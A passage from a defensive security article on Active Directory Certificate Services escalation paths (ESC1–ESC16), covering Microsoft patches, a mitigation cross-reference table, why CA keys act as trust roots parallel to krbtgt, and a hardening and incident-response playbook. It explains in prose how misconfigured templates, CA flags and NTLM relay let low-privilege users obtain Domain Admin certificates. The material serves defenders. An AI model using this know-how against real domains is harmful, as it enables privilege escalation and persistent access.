&lt;p&gt;The mechanics: KB5014754 introduces the &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt; extension (OID 1.3.6.1.4.1.311.25.2), embeds the requester&apos;s SID into every issued certificate by default, and redefines which &lt;code&gt;altSecurityIdentities&lt;/code&gt; mappings the KDC will accept. Deployment is staged across three modes -- Disabled, Compatibility, and Full Enforcement -- with the Full Enforcement transition originally planned for November 2023, then repeatedly delayed in response to customer compatibility issues with SCEP, Intune PKCS, and non-Microsoft PKIs. The KB&apos;s current text states that Full Enforcement becomes the default on February 11, 2025, and the legacy compatibility-mode registry override is removed by the September 9, 2025 Windows security update [@kb5014754].&lt;/p&gt;
&lt;p&gt;What it closes: ESC9 (because Full Enforcement rejects certificates lacking the SID extension), ESC10 (because weak mappings are rejected), and Certifried even on unpatched templates. It is &lt;em&gt;bypassed&lt;/em&gt; by ESC16, which disables the SID extension at the CA level.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CVE-2024-49019 (EKUwu / ESC15) -- November 12, 2024.&lt;/strong&gt; Patched thirty-five days after Bollinger&apos;s October 8, 2024 disclosure [@bollinger-ekuwu]. The November 12, 2024 Patch Tuesday addressed the V1 WebServer template Application-Policies override [@cve-2024-49019-nvd] [@cve-2024-49019-msrc]. The patch hardens the KDC&apos;s interpretation of Application Policies in V1 certificates; it does not close ESC16, ESC11, or anything in the template DACL space.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s Windows Security Servicing Criteria reserves CVEs for vulnerabilities in default product state [@msrc-servicing-criteria]. Misconfigurations that require administrator action to introduce are treated as hardening matters and receive documentation rather than CVEs. The 2019 ANSSI altSecurityIdentities report received a &quot;won&apos;t fix&quot; response on exactly these grounds [@dedrouas-altsec]. The boundary explains the catalog&apos;s CVE asymmetry: ESC1 (template flag) is configuration; Certifried (a default-template behavior on an account-creation-default-permission interaction) is a CVE. ESC15 sat on the boundary -- the affected template is shipped pre-installed and cannot be uninstalled, so its default-state could be argued either way -- and Microsoft chose to issue a CVE. The boundary is operational policy, not technical bound; it can move.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The single most useful table in this article is the cross-reference of which Microsoft mitigation closes which ESC. Read row by row to understand which ESCs are runtime-closed in a hardened environment and which remain dependent on the customer&apos;s administrative hardening discipline.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;ESC&lt;/th&gt;
&lt;th&gt;KB5005413 (2021)&lt;/th&gt;
&lt;th&gt;CVE-2022-26923 (2022)&lt;/th&gt;
&lt;th&gt;KB5014754 (2022-2025)&lt;/th&gt;
&lt;th&gt;CVE-2024-49019 (2024)&lt;/th&gt;
&lt;th&gt;Hardening only&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ESC1&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Partial (SID ext defeats SAN supply for cert-authn)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Primary mitigation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC2&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC3&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Partial (SID ext binds the cert to the agent)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC4&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC5&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC6&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Partial (SID ext defeats requested SAN)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Primary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC7&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC8 (HTTP)&lt;/td&gt;
&lt;td&gt;Closed when EPA + SSL deployed&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Continues if EPA off&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC9&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Closed at Full Enforcement&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Until Feb 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC10&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Closed at Full Enforcement&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Until Feb 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC11 (RPC)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Primary (&lt;code&gt;IF_ENFORCEENCRYPTICERTREQUEST&lt;/code&gt; flag)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC12&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Primary (HSM hardening)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC13&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC14&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC15&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Closed (Nov 12, 2024)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESC16&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Bypassed (this attack disables the extension)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Primary&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Of sixteen ESCs, three have CVE-class binary patches (Certifried, EKUwu, and -- if you count it -- the KB5005413 NTLM-relay hardening track), two are runtime-closed under KB5014754 Full Enforcement, and the remaining eleven are administrative hardening matters. If only three of sixteen have CVEs, what stops the catalog from growing forever?&lt;/p&gt;
&lt;h2&gt;8. The Two-Trust-Roots Problem&lt;/h2&gt;
&lt;p&gt;What stops the catalog from growing forever is the architectural property the catalog enumerates around but cannot eliminate. The catalog grows because the property is structural, not because the engineering is sloppy. Four pieces of theory anchor the limit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Two trust roots.&lt;/strong&gt; Active Directory&apos;s Kerberos KDC will mint a Domain Admin Ticket-Granting Ticket on presentation of any valid certificate signed by a CA in the forest&apos;s &lt;code&gt;NTAuthCertificates&lt;/code&gt; container, provided the certificate maps to the Administrator principal. The &lt;code&gt;krbtgt&lt;/code&gt; key is the symmetric root of trust for password and TGS authentication; an NTAuth CA&apos;s private key is an asymmetric root of trust for PKINIT. There is no architectural relationship between the two. Rotating the &lt;code&gt;krbtgt&lt;/code&gt; key does not invalidate any certificate. Revoking a CA does not invalidate &lt;code&gt;krbtgt&lt;/code&gt;-issued tickets. They are &lt;em&gt;independent authenticator-minting keys&lt;/em&gt;. For a forest with $n$ NTAuth-published CAs, the count of independent keys that can mint a Domain Admin authenticator is $n + 1$.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; For an Active Directory forest with $n$ Certificate Authorities published into &lt;code&gt;NTAuthCertificates&lt;/code&gt;, there are exactly $n + 1$ independent keys that can mint a Domain Admin authenticator: the krbtgt account hash, and the private key of every published CA. Rotating krbtgt closes one root. Revoking one CA closes another. The other $n - 1$ remain. The ESC catalog enumerates &lt;em&gt;how&lt;/em&gt; an attacker can make those keys issue a Domain Admin authenticator with low-privilege materials; the architectural property -- that there are $n + 1$ such keys at all -- is a design property of PKINIT and is not closable by any patch [@rfc4556] [@cpo-whitepaper].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;PKINIT&apos;s binding gap.&lt;/strong&gt; RFC 4556 specifies how a Kerberos client presents a certificate and receives a TGT [@rfc4556]. The RFC does not bind the certificate to a Microsoft SID; the mapping from certificate to AD principal is a Microsoft extension. The KB5014754 strong-mapping track closes the &lt;em&gt;mapping ambiguity&lt;/em&gt; by embedding the requester&apos;s SID into the certificate and matching the SID on the KDC side [@kb5014754]. It does not close the underlying primitive: a certificate is an alternate identity assertion that the KDC honors as long as the signing CA is trusted. Different ESCs find different ways to get a useful certificate; the authentication step is identical across the catalog.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The transport-versus-principal split.&lt;/strong&gt; The §6 BloodHound Aside develops this in full: BloodHound&apos;s principal-graph model now expresses ESC8 as the &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge, but ESC11 remains the open structural case because the RPC transport has no equivalent coercion gadget [@bh-coerce-adcs-edge]. The model limit is partial, not total -- it applies to RPC, not to all transport attacks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The configuration-versus-CVE boundary.&lt;/strong&gt; The §7 Callout develops this in full. The catalog has accumulated CVEs only when Microsoft judged the configuration was default-state -- Certifried&apos;s machine-account-quota path and ESC15&apos;s pre-installed V1 templates. The architectural property is policy-driven and movable.&lt;/p&gt;

Active Directory has two trust roots that can mint a Domain Admin authenticator: the krbtgt key, and any CA published into NTAuth. Rotating one does not touch the other.
&lt;p&gt;The architectural property reshapes how operators should think about the catalog. The catalog is not an arms race that ends; the catalog is the community mapping the surface of a design property of PKINIT. Each new ESC narrows the description of &lt;em&gt;what surface remains exposed&lt;/em&gt;; no plausible patch removes the underlying $n + 1$ key count. Until PKINIT itself is replaced -- until PKINIT is deprecated, until the KDC stops accepting certificate-based authentication, until NTAuth-published CAs lose their KDC trust -- every NTAuth-published CA in the forest is a key parallel to krbtgt.&lt;/p&gt;
&lt;p&gt;If the architectural limit cannot be closed, what are the open questions in 2026?&lt;/p&gt;

flowchart LR
    K[krbtgt account hash&lt;br /&gt;symmetric KDC key]
    CA1[CA #1 private key&lt;br /&gt;published in NTAuth]
    CA2[CA #2 private key&lt;br /&gt;published in NTAuth]
    CAN[CA #n private key&lt;br /&gt;published in NTAuth]
    KDC[Kerberos KDC&lt;br /&gt;and PKINIT]
    AUTH[Domain Admin&lt;br /&gt;authenticator TGT]
    K --&amp;gt; KDC
    CA1 --&amp;gt; KDC
    CA2 --&amp;gt; KDC
    CAN --&amp;gt; KDC
    KDC --&amp;gt; AUTH
&lt;h2&gt;9. Open Problems and the Catalog&apos;s Closure&lt;/h2&gt;
&lt;p&gt;The catalog has no published closure principle. Here are the five open frontiers in 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No closure principle.&lt;/strong&gt; The catalog has grown every year since 2021: ESC1 through ESC8 in June 2021; ESC9 and ESC10 in August 2022; ESC11 in November 2022; ESC12 in October 2023 [@knobloch-esc12] [@knobloch-esc12-archive]; ESC13 and ESC14 in February 2024; ESC15 in October 2024; ESC16 named in 2025 against a workaround from 2022 [@specterops-esc16-docs]. ESC15 revealed a twenty-four-year-old default behavior on V1 templates -- behavior that had been quietly present since the role&apos;s 2000 shipping date [@bollinger-ekuwu]. The Certify documentation conjectures an upper bound (the six primitive categories times the misconfigurable bits per primitive) but no formal upper bound is published. ESC15 is itself an existence proof that &lt;em&gt;new categories&lt;/em&gt; still emerge: Application Policies as a parallel to standard EKU was not in the original 2021 catalog at all.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Detection asymmetry.&lt;/strong&gt; Most ESCs leave artifacts on the CA -- specifically Event ID 4886 (certificate request submitted) and Event ID 4887 (certificate issued) -- and no artifact in the standard Active Directory event stream. Most SIEMs do not ingest CA logs, because CA logs were never on the standard Tier-Zero ingest checklist. The result is that the CA&apos;s own audit log carries the only reliable forensic primitive for the entire catalog, and that log is in a place the SOC does not look. Locksmith and PSPKIAudit can identify the &lt;em&gt;misconfigurations&lt;/em&gt; but cannot tell you whether they have been &lt;em&gt;exploited&lt;/em&gt;; that signal lives in the CA&apos;s audit log alone.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Strong-mapping migration risk.&lt;/strong&gt; The KB5014754 staged rollout enters Full Enforcement on February 11, 2025 and removes the legacy compatibility-mode registry override on September 9, 2025 [@kb5014754]. Environments with legacy SCEP gateways, third-party PKI vendors, Intune PKCS profiles without strong mapping, or smart cards issued by non-Microsoft CAs face a real risk that &lt;em&gt;legitimate&lt;/em&gt; authentication breaks at Full Enforcement. The Microsoft Tech Community Intune guidance is the operational reference for the SCEP/PKCS path [@ms-tc-intune]. The migration is a security upgrade and a deployment minefield in the same package; environments that defer the rollout past September 9, 2025 lose the legacy override and are forced into Full Enforcement by an OS update they did not opt into.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Per the live KB5014754 text on Microsoft Support: &quot;By February 2025, if the StrongCertificateBindingEnforcement registry key is not configured, domain controllers will move to Full Enforcement mode&quot; and &quot;the option to move back to Compatibility mode will remain until the September 9, 2025, Windows security update is installed&quot; [@kb5014754]. Environments that have not finished the strong-mapping rollout by those dates -- particularly those with non-Microsoft PKI in the chain, including legacy SCEP / Intune PKCS / smart-card vendors -- should plan for breakage and have a rollback plan ready.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Cloud PKI.&lt;/strong&gt; Entra-managed Cloud PKI changes the substrate: the issuing CA is Microsoft-operated, the template surface is partially exposed to administrators, and the trust relationship between Cloud PKI and on-premises Active Directory is itself a configurable bridge. The community has not yet published an ESC catalog for Cloud PKI; the on-premises catalog is on-prem-specific and does not transfer directly. The open question is whether the Cloud PKI substrate has its own equivalent primitives (a CA-side &quot;this template is configured with ESS-equivalent behavior&quot;) that just have not yet been named.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The NTLM dependency in ESC8 and ESC11.&lt;/strong&gt; Both ESC8 and ESC11 depend on NTLM authentication being available between the coerced computer and the CA host. Microsoft&apos;s stated direction is to disable NTLM by default in future Windows releases (the &quot;NTLM disablement&quot; track) [@ms-ntlm-evolution]. If that direction completes, ESC8 and ESC11&apos;s relay primitives lose their substrate -- not because the AD CS transport hardens, but because there is no NTLM authentication to relay. The rest of the catalog -- the template, ACL, mapping, and CA-configuration ESCs -- does not depend on NTLM and is unaffected by NTLM disablement.&lt;/p&gt;
&lt;p&gt;Taken together, these results suggest the catalog&apos;s growth trajectory is structural. The reason ESC15 surfaced a twenty-four-year-old default is not that the SpecterOps team was lazy in 2021; it is that the surface is so large that systematic enumeration of every cross-product (six primitives multiplied by the configurable bits per primitive) is itself a research program. Knowing the architectural limits and the open problems, here is the operational playbook.&lt;/p&gt;
&lt;h2&gt;10. The Four-Lane Playbook&lt;/h2&gt;
&lt;p&gt;Here is what an enterprise security program actually does, in four lanes. Lane discipline matters because the catalog rewards parallel work: a single quarter spent only on Lane 1 leaves you detection-blind, and a single quarter spent only on Lane 2 leaves you remediation-paralyzed.&lt;/p&gt;
&lt;h3&gt;Lane 1: Preventive hygiene&lt;/h3&gt;
&lt;p&gt;Run Locksmith and PSPKIAudit on every Enterprise CA at least monthly [@locksmith-gh] [@pspkiaudit-gh]. Both tools enumerate the published catalog and produce a triage list. The defender baseline these tools encode is roughly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Template ACL audit. Confirm that no non-Tier-Zero principal holds &lt;code&gt;WriteDacl&lt;/code&gt;, &lt;code&gt;WriteOwner&lt;/code&gt;, &lt;code&gt;WriteProperty&lt;/code&gt;, or &lt;code&gt;GenericAll&lt;/code&gt; on any V2 template.&lt;/li&gt;
&lt;li&gt;CA security descriptor audit. Confirm that &lt;code&gt;Manage CA&lt;/code&gt; and &lt;code&gt;Issue and Manage Certificates&lt;/code&gt; are held only by Tier-Zero principals.&lt;/li&gt;
&lt;li&gt;ESS audit. Confirm that no template enrollable by &lt;code&gt;Authenticated Users&lt;/code&gt; or &lt;code&gt;Domain Users&lt;/code&gt; has &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; set with Client Authentication EKU and no Manager Approval.&lt;/li&gt;
&lt;li&gt;CA registry audit. Confirm that &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt; is &lt;em&gt;not&lt;/em&gt; set, and &lt;code&gt;IF_ENFORCEENCRYPTICERTREQUEST&lt;/code&gt; &lt;em&gt;is&lt;/em&gt; set.&lt;/li&gt;
&lt;li&gt;SID extension audit. Confirm that &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt; (OID 1.3.6.1.4.1.311.25.2) is &lt;em&gt;not&lt;/em&gt; present in any CA&apos;s &lt;code&gt;DisableExtensionList&lt;/code&gt; registry value -- closing the ESC16 path.&lt;/li&gt;
&lt;li&gt;Manager Approval on sensitive templates. Confirm that any template with privileged EKU sets has Manager Approval.&lt;/li&gt;
&lt;li&gt;Least-privilege Enroll. Confirm that Domain Users-equivalent groups do not hold Enroll or Autoenroll on sensitive templates.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Lane 2: Detection deployment&lt;/h3&gt;
&lt;p&gt;Ingest the CA&apos;s own Security event log into the SIEM. The two load-bearing events are 4886 (&quot;Certificate Services received a certificate request&quot;) and 4887 (&quot;Certificate Services approved a certificate request and issued a certificate&quot;). These events are what fire when an operator chain like the cold-open in section one executes. They are the only AD CS event stream the SOC needs to detect the entire issuance side of the catalog.&lt;/p&gt;
&lt;p&gt;Enable Microsoft Defender for Identity sensors on every AD CS server. MDI now ships nine named ESC posture assessments -- ESC1 (Preview), ESC2, ESC3, ESC4 (template owner and template ACL as two separate assessments), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15 -- and surfaces them in the same console the SOC uses for the rest of Active Directory [@mdi-certs]. The ADCS-resident sensor is the only MDI sensor that produces these particular assessments; environments running MDI on Domain Controllers only do not get the AD CS surface.&lt;/p&gt;
&lt;p&gt;Run SharpHound CE with the AD CS collection options enabled and ingest the resulting graph into BloodHound CE. Tag NTAuth-published CAs and their pre-installed sensitive templates as Tier Zero in BloodHound&apos;s Privilege Zones. Run the analysis layer&apos;s &lt;code&gt;Shortest Paths to Tier Zero&lt;/code&gt; query weekly; ESC1, ESC3, ESC4, ESC6a/b, ESC9a/b, ESC10a/b, and ESC13 will surface as edges, along with &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; paths for any ESC8-vulnerable HTTP enrollment endpoint [@bh-llms] [@bh-coerce-adcs-edge].&lt;/p&gt;
&lt;p&gt;Schedule Locksmith on a recurring cadence with output to a triage queue. Locksmith is the lowest-friction defender tool; it identifies and (with mode 1) optionally fixes published-catalog findings with a single cmdlet.&lt;/p&gt;
&lt;h3&gt;Lane 3: Confirmed-compromise response&lt;/h3&gt;
&lt;p&gt;This lane carries the article&apos;s load-bearing operational claim. If a CA&apos;s private key is suspected compromised -- whether through ESC12 hardware-substrate compromise, through &lt;code&gt;ntdsutil&lt;/code&gt;-equivalent CA export, or through a vendor compromise of the HSM -- the recovery path is &lt;em&gt;not&lt;/em&gt; &quot;rotate krbtgt&quot; and &lt;em&gt;not&lt;/em&gt; &quot;revoke the affected certificates&quot;. The recovery path is multi-week:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Revoke the CA&apos;s published certificate chain.&lt;/li&gt;
&lt;li&gt;Decommission the CA (remove the role service, delete the CA private key store, retire the host).&lt;/li&gt;
&lt;li&gt;Build a replacement CA on new hardware with a new key.&lt;/li&gt;
&lt;li&gt;Publish the new CA into &lt;code&gt;NTAuthCertificates&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Distrust the old CA&apos;s certificates throughout the forest (CRL update, certificate revocation lists pushed via Group Policy, decommissioning all certificates issued by the compromised CA).&lt;/li&gt;
&lt;li&gt;Re-issue every credential that depended on the compromised CA.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This operation is analogous in scale and duration to a forest rebuild for &lt;code&gt;krbtgt&lt;/code&gt; compromise -- a multi-week IR project, not a one-day patch. The reason is the two-trust-roots property: revoking the CA closes only one of the $n + 1$ keys; if the operator already minted Golden Certificates against the CA&apos;s private key, those certificates outlive the revocation unless every issued serial is on the CRL and every relying party has a fresh CRL fetch policy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Lane-3 CA rebuild operation is the single most important &lt;em&gt;preparatory&lt;/em&gt; deliverable in this entire playbook. Run a tabletop exercise: &quot;the CA private key is compromised; what are the steps to a clean state?&quot; If the answer is unclear in the absence of an incident, the answer will be improvised during one -- typically poorly. Build the runbook, identify the operational owners, pre-stage the replacement CA&apos;s hardware, and document the certificate inventory you will need to re-issue. The two-week recovery becomes a one-week recovery if the prep is done; the two-week recovery becomes a four-week recovery if it is not.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Lane 4: What does not work&lt;/h3&gt;
&lt;p&gt;Five operator myths that the catalog refutes by construction:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&quot;Rotating krbtgt closes AD CS.&quot;&lt;/strong&gt; Wrong. Rotating krbtgt closes the symmetric KDC key; it does not touch the asymmetric CA private keys in &lt;code&gt;NTAuthCertificates&lt;/code&gt;. An ESC1 certificate issued against the new krbtgt mints a Domain Admin TGT the same way it would have against the old one.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&quot;Credential Guard protects against ESC.&quot;&lt;/strong&gt; Wrong. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&apos;s LSAISO&lt;/a&gt; isolates LSASS-resident credentials from the rest of the OS. AD CS abuse does not touch LSAISO; the certificate is issued by the CA against a request submitted over a network protocol. The credential never leaves the attacker&apos;s machine in a form Credential Guard could isolate.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&quot;Disabling Web Enrollment closes AD CS.&quot;&lt;/strong&gt; Partial. Disabling the AD CS Web Enrollment role service closes ESC8 (the HTTP relay primitive). It does not affect ESC1 through ESC7 (template, ACL, and CA-config attacks), ESC11 (RPC relay), or any of the mapping ESCs. The default RPC enrollment transport on every Enterprise CA is unaffected.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&quot;If we patch CVE-2022-26923 we&apos;re done.&quot;&lt;/strong&gt; Wrong. CVE-2022-26923 closes the specific &lt;code&gt;dNSHostName&lt;/code&gt; machine-account-impersonation chain. It does not close ESC1, ESC4, or any of the configuration ESCs that the same operator chain could have taken.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&quot;Reset krbtgt twice and we have evicted the attacker.&quot;&lt;/strong&gt; Wrong. The double-krbtgt-reset playbook is well-suited for Golden Ticket eviction. It is not effective against an attacker who has issued a long-validity authentication certificate from a CA the attacker controls or has compromised. The issued certificate authenticates against the new krbtgt the same way it did against the old one, because PKINIT does not bind the certificate&apos;s authority to the symmetric krbtgt key.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Run Locksmith this week. Tag NTAuth CAs as Tier Zero in BloodHound. Schedule the Lane 3 rebuild playbook before you need it. The catalog grew faster than the patches; the defender&apos;s only working strategy is parallel work in all four lanes.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

The SID extension is on by default for any CA running an OS that has installed KB5014754 or later. The catch is what the *KDC* does with that extension. Switching the KDC to Full Enforcement breaks every certificate that lacks the SID extension, which is why Microsoft built the three-mode staged rollout: the §7 timeline anchors the compatibility window (mechanics and the Feb 11, 2025 / Sep 9, 2025 milestones), and the §9 Callout carries the verbatim KB5014754 dates and the customer compatibility-friction set (legacy SCEP, Intune PKCS, non-Microsoft PKI, third-party smart cards). ESC16 closes the loop in the other direction: an admin (or a compromised admin) can re-disable the extension at the CA level, recreating the weak-mapping condition KB5014754 was designed to close.

Partially. The on-premises ESC catalog enumerates misconfigurations of the on-premises AD CS role. Entra Cloud PKI is a Microsoft-operated SaaS CA whose substrate is not the on-premises AD CS Windows role at all -- so ESCs that abuse on-premises CA registry flags (ESC6, ESC16), on-premises CA DACLs (ESC5, ESC7), or the on-premises transport (ESC8, ESC11) do not transfer directly. But Cloud PKI still issues authentication certificates, still has a template-equivalent administrative surface, and still maps certificates onto AD or Entra principals. The community has not yet published a Cloud PKI ESC catalog; the open question is whether the cross-product of Cloud PKI&apos;s primitive surface and its mapping behavior has its own equivalent class of named misconfigurations.

No. A two-tier hierarchy improves protection of the *root* CA&apos;s private key (the root signs only the subordinate&apos;s certificate and stays offline) but does nothing for the subordinate. The ESC catalog attacks the issuing subordinate, not the root. The misconfigured Enrollee-Supplies-Subject template, the editable `EDITF_ATTRIBUTESUBJECTALTNAME2` registry flag, the per-template DACL, the NTLM-relayable Web Enrollment endpoint -- all live on the subordinate CA. A two-tier hierarchy is the right architecture and is essentially orthogonal to the ESC discussion.

No. Smart cards are *consumers* of certificates issued by AD CS; the smart-card pipeline reads a certificate off the card, presents it to PKINIT, and receives a TGT. AD CS is the *issuing* substrate. Every ESC attacks the issuance side. A smart-card deployment depends on AD CS being correctly configured; it adds no defense against ESC1 through ESC16 and may add complexity in the strong-mapping migration (smart-card-issued certificates may use legacy mappings that break under Full Enforcement).

No. BloodHound CE does not ship a numbered `ADCSESC8` edge. It ships `CoerceAndRelayNTLMToADCS`, an edge representing &quot;a computer can be SMB-coerced to authenticate to an attacker host, and the attacker host can relay that authentication to an ESC8-vulnerable Web Enrollment endpoint on a CA&quot; [@bh-coerce-adcs-edge]. Look for that edge, not for a numbered ESC8 edge. If `CoerceAndRelayNTLMToADCS` paths exist anywhere in the graph, your Web Enrollment endpoint is ESC8-exposed and the operator chain from any coercible computer to a Domain Admin authenticator runs in eight minutes.

ESC12 is treated in the §5 Aside: Knobloch&apos;s October 2023 YubiHSM hardware-substrate disclosure (earliest Wayback snapshot dated October 24, 2023), scoped out of the body because the abuse depends on the specific HSM vendor and on shell access to the CA host [@knobloch-esc12] [@knobloch-esc12-archive]. ESC0 does not exist in the SpecterOps catalog; some operator blogs use &quot;ESC0&quot; informally to describe naive enumeration (no abuse, just &quot;the CA is reachable and the template store is readable&quot;) but it is not a community-named technique.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;ad-cs-esc-catalog&quot; keyTerms={[
  { term: &quot;PKINIT&quot;, definition: &quot;RFC 4556 protocol extension that lets a client authenticate to Kerberos with a certificate and receive a TGT.&quot; },
  { term: &quot;NTAuthCertificates&quot;, definition: &quot;Forest-wide AD container listing CA certificates trusted by the KDC for client authentication. Publication here makes a CA&apos;s key a trust root parallel to krbtgt.&quot; },
  { term: &quot;ENROLLEE_SUPPLIES_SUBJECT&quot;, definition: &quot;msPKI-Certificate-Name-Flag bit (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) that lets the requester specify the certificate Subject or SAN; primary primitive of ESC1.&quot; },
  { term: &quot;EDITF_ATTRIBUTESUBJECTALTNAME2&quot;, definition: &quot;CA-side registry flag that lets any request include a SAN of choice; primary primitive of ESC6.&quot; },
  { term: &quot;szOID_NTDS_CA_SECURITY_EXT&quot;, definition: &quot;OID 1.3.6.1.4.1.311.25.2; certificate extension carrying the requester SID. Introduced in KB5014754; load-bearing element of strong mapping.&quot; },
